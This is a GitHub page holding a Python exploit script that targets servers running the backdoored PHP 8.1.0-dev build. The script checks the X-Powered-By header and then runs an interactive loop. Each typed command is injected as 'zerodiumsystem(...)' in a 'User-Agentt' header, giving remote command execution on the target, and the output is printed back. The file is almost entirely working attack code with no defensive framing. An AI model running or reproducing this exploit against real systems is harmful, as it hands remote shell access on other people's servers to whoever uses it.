-
Notifications
You must be signed in to change notification settings - Fork 1
/
exploit.py
68 lines (49 loc) · 1.58 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
#!/usr/bin/env python3
import os
import sys
import requests
from prompt_toolkit import PromptSession
def get_target():
if len(sys.argv) != 2 or "-h" in sys.argv or "--help" in sys.argv:
print(f"Usage: {os.path.basename(sys.argv[0])} http://<target>")
sys.exit(1)
return sys.argv[1]
def check_vuln(target):
try:
response = requests.get(target)
except requests.exceptions.RequestException:
print("[-] Failed to connect to the target")
sys.exit(1)
if response.headers.get("X-Powered-By") != "PHP/8.1.0-dev":
print("[-] Target is not vulnerable")
sys.exit(1)
def get_shell(target):
session = PromptSession()
while True:
command = session.prompt("> ")
if not command:
continue
if command == "clear":
os.system("cls" if os.name == "nt" else "clear")
continue
if command == "exit":
sys.exit(0)
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0",
"User-Agentt": f"zerodiumsystem('{command}');",
}
try:
response = requests.get(target, headers=headers)
except requests.exceptions.RequestException:
print("[-] Failed to connect to the target")
sys.exit(1)
print(response.text.split("<!DOCTYPE html>")[0])
def main():
try:
target = get_target()
check_vuln(target)
get_shell(target)
except KeyboardInterrupt:
sys.exit(1)
if __name__ == "__main__":
main()